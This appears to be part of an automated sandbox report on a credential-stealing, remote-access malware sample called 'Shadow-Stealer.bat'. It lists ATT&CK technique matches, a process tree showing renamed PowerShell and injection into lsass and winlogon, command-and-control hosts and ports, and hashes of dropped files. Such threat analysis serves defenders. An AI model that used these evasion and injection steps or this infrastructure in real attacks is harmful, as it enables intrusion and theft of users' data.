Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\$sxr-cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\$sxr-powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\$sxr-mshta.exe Code function: 10_2_000001ACE9011540 cpuid 10_2_000001ACE9011540
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\$sxr-mshta.exe Code function: 10_2_000001ACEA2D7AE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_000001ACEA2D7AE0
Source: C:\Windows\System32\dllhost.exe Code function: 20_2_000000014000165C CreateNamedPipeW,20_2_000000014000165C
Source: C:\Windows\$sxr-mshta.exe Code function: 10_2_00007FF64E1D1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,10_2_00007FF64E1D1008

            Stealing of Sensitive Information

Source: Yara match, File source: Process Memory Space: $sxr-powershell.exe PID: 6400, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match, File source: Process Memory Space: $sxr-powershell.exe PID: 6400, type: MEMORYSTR
MITRE ATT&CK Matrix

Tactic columns: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact, Resource Development, Reconnaissance.

Techniques matched by this sample, with the number of matching signatures in parentheses:

Initial Access: Valid Accounts (1)
Execution: Windows Management Instrumentation (1), Scripting (1), Native API (2), Command and Scripting Interpreter (21), Scheduled Task/Job (1), PowerShell (31)
Persistence: DLL Side-Loading (1), Valid Accounts (1), Scheduled Task/Job (1)
Privilege Escalation: DLL Side-Loading (1), Valid Accounts (1), Access Token Manipulation (11), Process Injection (413), Scheduled Task/Job (1)
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Scripting (1), Obfuscated Files or Information (1), Software Packing (3), Timestomp (1), DLL Side-Loading (1), File Deletion (1), Masquerading (121), Valid Accounts (1), Virtualization/Sandbox Evasion (41), Access Token Manipulation (11), Process Injection (413), Hidden Files and Directories (1)
Credential Access: Input Capture (11)
Discovery: System Time Discovery (1), File and Directory Discovery (3), System Information Discovery (37), Query Registry (1), Security Software Discovery (31), Process Discovery (2), Virtualization/Sandbox Evasion (41), Application Window Discovery (1)
Lateral Movement: no technique matched
Collection: Archive Collected Data (1), Email Collection (1), Input Capture (11)
Exfiltration: no technique matched
Command and Control: Encrypted Channel (1), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (1)
Network Effects, Remote Service Effects, Impact, Resource Development, Reconnaissance: no technique matched
Behavior Graph (ID: 1352637; Sample: Shadow-Stealer.bat; Start date: 03/12/2023; Architecture: WINDOWS; Score: 100)

Top-level signatures shown in the graph: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Detected unpacking (creates a PE file in dynamic memory); 6 other signatures.

Contacted hosts: throbbing-mountain-09011.pktriot.net; eu-central-7075.packetriot.net (167.71.56.116, ports 22112, 49716, 49725, DIGITALOCEAN-ASN, United States).

Process tree recovered from the graph:
- cmd.exe drops C:\Users\user\...\Shadow-Stealer.bat.exe (PE32+) and starts Shadow-Stealer.bat.exe and conhost.exe (Renames powershell.exe to bypass HIPS).
- Shadow-Stealer.bat.exe drops C:\Windows\$sxr-powershell.exe, C:\Windows\$sxr-mshta.exe and C:\Windows\$sxr-cmd.exe (all PE32+) and starts four dllhost.exe instances (Deletes itself after installation; Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 3 other signatures).
- $sxr-mshta.exe starts $sxr-cmd.exe (Drops executables to the windows directory (C:\Windows) and starts them).
- $sxr-cmd.exe starts $sxr-powershell.exe and conhost.exe (Suspicious powershell command line found; Very long command line found; Bypasses PowerShell execution policy).
- $sxr-powershell.exe connects to eu-central-7075.packetriot.net and starts three dllhost.exe instances plus 7 other processes (Suspicious powershell command line found; Very long command line found; Drops executables to the windows directory (C:\Windows) and starts them; 8 other signatures; Powershell is started from unusual location (likely to bypass HIPS)).
- The dllhost.exe instances inject into winlogon.exe, lsass.exe, svchost.exe, dwm.exe, cscript.exe, WmiPrvSE.exe and yApVCRtJPjQJu.exe (Writes to foreign memory regions; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes).
- winlogon.exe starts four further dllhost.exe instances, which inject into several svchost.exe instances (Writes to foreign memory regions; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes); lsass.exe also writes to foreign memory regions.

Source | Detection | Scanner | Label
Shadow-Stealer.bat | 0% | ReversingLabs | -
Shadow-Stealer.bat | 0% | Virustotal | -

Source | Detection | Scanner | Label
C:\Users\user\Desktop\Shadow-Stealer.bat.exe | 0% | ReversingLabs | -
C:\Users\user\Desktop\Shadow-Stealer.bat.exe | 0% | Virustotal | -
C:\Windows\$sxr-cmd.exe | 0% | ReversingLabs | -
C:\Windows\$sxr-cmd.exe | 0% | Virustotal | -
C:\Windows\$sxr-mshta.exe | 0% | ReversingLabs | -
C:\Windows\$sxr-mshta.exe | 0% | Virustotal | -
C:\Windows\$sxr-powershell.exe | 0% | ReversingLabs | -
C:\Windows\$sxr-powershell.exe | 0% | Virustotal | -

No Antivirus matches

Source | Detection | Scanner | Label
eu-central-7075.packetriot.net | 16% | Virustotal | -
throbbing-mountain-09011.pktriot.net | 2% | Virustotal | -

Source | Detection | Scanner | Label
http://www.microsoft. | 0% | URL Reputation | safe
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
http://crl.micros | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
eu-central-7075.packetriot.net | 167.71.56.116 | true | true | - | unknown
throbbing-mountain-09011.pktriot.net | unknown | unknown | true | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 00000018.00000000.2485644679.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361810056.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://stackoverflow.com/q/14436606/23354 | $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCFF5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.newtonsoft.com/jsonschema | $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/soap12/P | lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.newtonsoft.com/json | $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.nuget.org/packages/Newtonsoft.Json.Bson | $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.microsoft. | lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, cscript.exe, 0000001C.00000002.3371306184.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001C.00000000.2515366668.0000000002F17000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6 | $sxr-powershell.exe, 00000013.00000002.3357613110.000001F58004F000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore68 | $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABC7D1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000013.00000002.3357613110.000001F580074000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 00000018.00000000.2485644679.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361810056.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABC7D1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000013.00000002.3357613110.000001F58009C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://james.newtonking.com/projects/json | $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/JamesNK/Newtonsoft.Json | $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.micros | cscript.exe, 0000001C.00000002.3371306184.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001C.00000000.2515366668.0000000002F17000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
167.71.56.116 | eu-central-7075.packetriot.net | United States | 14061 | DIGITALOCEAN-ASNUS | true
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1352637
Start date and time: 2023-12-03 16:33:58 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 12
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Shadow-Stealer.bat
Detection: MAL
Classification: mal100.troj.spyw.evad.winBAT@52/13@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 90
• Number of non-executed functions: 277
Cookbook Comments:
• Found application associated with file extension: .bat
• Excluded processes from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing behavior information.
• Report size exceeded the maximum capacity and may be missing disassembly code.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Report size getting too big: too many NtReadVirtualMemory calls found.
• Report size getting too big: too many NtSetInformationFile calls found.
Time     | Type            | Description
16:34:54 | API Interceptor | 34x Sleep call for process: Shadow-Stealer.bat.exe modified
16:35:14 | API Interceptor | 13371x Sleep call for process: $sxr-powershell.exe modified
16:35:57 | API Interceptor | 123591x Sleep call for process: winlogon.exe modified
16:35:59 | API Interceptor | 113697x Sleep call for process: dwm.exe modified
16:35:59 | API Interceptor | 88254x Sleep call for process: lsass.exe modified
16:35:59 | API Interceptor | 654x Sleep call for process: svchost.exe modified
16:36:02 | API Interceptor | 83x Sleep call for process: cscript.exe modified
16:36:03 | API Interceptor | 78x Sleep call for process: WmiPrvSE.exe modified
16:36:04 | API Interceptor | 63x Sleep call for process: yApVCRtJPjQJu.exe modified
16:36:05 | API Interceptor | 220x Sleep call for process: conhost.exe modified
Match: 167.71.56.116
  Associated Sample Name / URL | Detection | Threat Name
  OvA6x5v34G.exe | malicious | AsyncRAT
  zUYpYikG7T.exe | malicious | njRat
  SdwkQEBnc3.exe | malicious | Nanocore
  riV1K85Awe.exe | malicious | Nanocore
  Malwarebytes Gears.exe | malicious | AsyncRAT
  H8RZSly6dG.exe | malicious | Njrat
  8E8732B9BEBC8382E938B48697E79FEB4B06528DF41FD.exe | malicious | njRat
  qCotr6jZt2.exe | malicious | njRat

Match: eu-central-7075.packetriot.net
  Associated Sample Name / URL | Detection | Threat Name | Context
  OvA6x5v34G.exe | malicious | AsyncRAT | 167.71.56.116
  zUYpYikG7T.exe | malicious | njRat | 167.71.56.116
  SdwkQEBnc3.exe | malicious | Nanocore | 167.71.56.116
  riV1K85Awe.exe | malicious | Nanocore | 167.71.56.116
  Malwarebytes Gears.exe | malicious | AsyncRAT | 167.71.56.116

Match: DIGITALOCEAN-ASNUS
  Associated Sample Name / URL | Detection | Threat Name | Context
  76IbxcfOQf.exe | malicious | Lokibot | 178.128.238.137
  file.exe | malicious | RedLine, SmokeLoader, Stealc | 37.139.22.180
  file.exe | malicious | RedLine, SmokeLoader | 37.139.22.180
  REQUEST FOR 01-DEC 2023.exe | malicious | FormBook | 64.225.91.73
  Altogether.exe | malicious | FormBook, GuLoader | 64.225.91.73
  Plyshaar.exe | malicious | FormBook, GuLoader | 64.225.91.73
  SecuriteInfo.com.Win32.PWSX-gen.16993.11761.exe | malicious | Lokibot | 178.128.238.137
  SecuriteInfo.com.Win32.PWSX-gen.1907.2567.exe | malicious | Lokibot | 178.128.238.137
  file.exe | malicious | RedLine, SmokeLoader | 165.227.156.49
  DocScan 105811-26.exe | malicious | FormBook | 64.225.91.73
  m2jngcTeBu.elf | malicious | Mirai | 162.243.214.175
  DocScan 814-1125-2023.exe | malicious | FormBook | 64.225.91.73
  https://login.logggiondocuumennnt.click/?username=cew@smrw.com | malicious | HTMLPhisher | 188.166.83.143
  tHRIRkYRbE.elf | malicious | Mirai | 138.68.169.154
  file.exe | malicious | RedLine, SmokeLoader | 67.205.189.1
  file.exe | malicious | RedLine, SmokeLoader | 142.93.169.197
  http://192.241.199.70 | malicious | Unknown | 192.241.199.70
  file.exe | malicious | BitCoin Miner, RedLine, SmokeLoader | 165.22.196.27
  file.exe | malicious | RedLine, SmokeLoader | 68.183.34.12
  malfor-cw-sample.exe | malicious | Unknown | 167.99.88.222
                                                                No context
Match: C:\Users\user\Desktop\Shadow-Stealer.bat.exe
  Associated Sample Name / URL | Detection | Threat Name
  trafik_yenilme.bat | malicious | Remcos, zgRAT
  a.bat | malicious | Agniane Stealer, zgRAT
  Rune_Launcher.bat | malicious | Quasar
  SCO_23.bat | malicious | zgRAT
  IMG_690B23.docx.bat | malicious | AgentTesla
  Qtagiietkyb.png.bat | malicious | Strela Stealer
  IMG_690B23.bat | malicious | AgentTesla, zgRAT
  SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe | malicious | Unknown
  SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe | malicious | Unknown
  345d.cmd | malicious | Unknown
  file.exe | malicious | Unknown
  file.exe | malicious | Unknown
  PingOptimizerMain.bat | malicious | Quasar
  crack.bat | malicious | Unknown
  da49aae4ea90792e9f5497dcd2c4fa8cf7bb98a23b2d846ab985facf.bat | malicious | Quasar
  Final_rooming_list.bat | malicious | Blackshades, Quasar
  RE_432-7784.js | malicious | Unknown
  FA150623.pdf.bat | malicious | AgentTesla
  Uni.bat | malicious | Unknown
  update_SC.bat | malicious | Unknown
Process: C:\Users\user\Desktop\Shadow-Stealer.bat.exe
File Type: CSV text
Category: dropped
Size (bytes): 3603
Entropy (8bit): 5.364531743127414
Encrypted: false
SSDEEP: 96:iqbYqGSI6o9xYsntpDxqKkWqmq1ftzHNYrKaq7mSRIzQ09wmj0qD:iqbYqGcQtpDxqKkWqmq1ftzHuLqdIzQk
MD5: CB025951AB11BC9879660B66AB48A871
SHA1: 539153A3469E5EA91A5700944F0CC3547C32AE21
SHA-256: 057D8F2026B51CBB81516E9A8DDE433D4AEBE1FF6E22D1CB60A742E1EA899367
SHA-512: E7095F21D3765FBC7E5F4E97C2CC37A8E56802D5AE7CAE1276BE62E096AF1B06B8B31B83CF7B475D6BE3D82186772B95ADB45A68A84AD060EDCCA3154B4CE6F9
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5

Process: C:\Users\user\Desktop\Shadow-Stealer.bat.exe
File Type: data
Category: modified
Size (bytes): 11608
Entropy (8bit): 4.887486353364779
Encrypted: false
SSDEEP: 192:I9sm73YrKkDp5hVsm5eml89smFp5IiMDOmEN3H+OHgFqxoeRM3YrKkDVsm5emlpj:HPYmiQ0HzAFItib4Mib4WVoGIpN6KQkT
MD5: 69E9F3FAAEAC92E92B26596DBA884D3B
SHA1: 02A87F2EAD0B9DC6202372D370B4D58D025B7CB2
SHA-256: F2453CFAB4FB2EB61E0E4DD4BAF35E926BE43E0C8E36569A3A325E605316B321
SHA-512: BD0EEF728D260D0BD217B507DC217BB96FA0C069FA872E6D5C8805B922ED81D9F0528AC1EE775F0BC1B1BB666FCE7B170385E5AE229A55D0D4FFF2AC936524FF
Malicious: false
Preview: PSMODULECACHE..........z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-.l..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.............z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa

Process: C:\Users\user\Desktop\Shadow-Stealer.bat.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulltP/XZ:NllU
MD5: F4FD6F7F8DDC8D2716B5AE289B93BDCE
SHA1: F48B3E013E3536DB71FED89B5786847E3951C767
SHA-256: 84EDE900B5623435AF6CC6C8266F751A2BF95CBF19E9B12C63178A389A3472C0
SHA-512: B7C830C41152C07E30DDA334F0B0F2CEF9632074FE87958680B490CC6A650145536D33178E2E744AAC2303014A4C243C3DAA5E44261291DC853C977911FFBB09
Malicious: false
Preview: @...e.................................4.*............@..........

Process: C:\Users\user\Desktop\Shadow-Stealer.bat.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\$sxr-powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Users\user\Desktop\Shadow-Stealer.bat.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\$sxr-powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\$sxr-powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
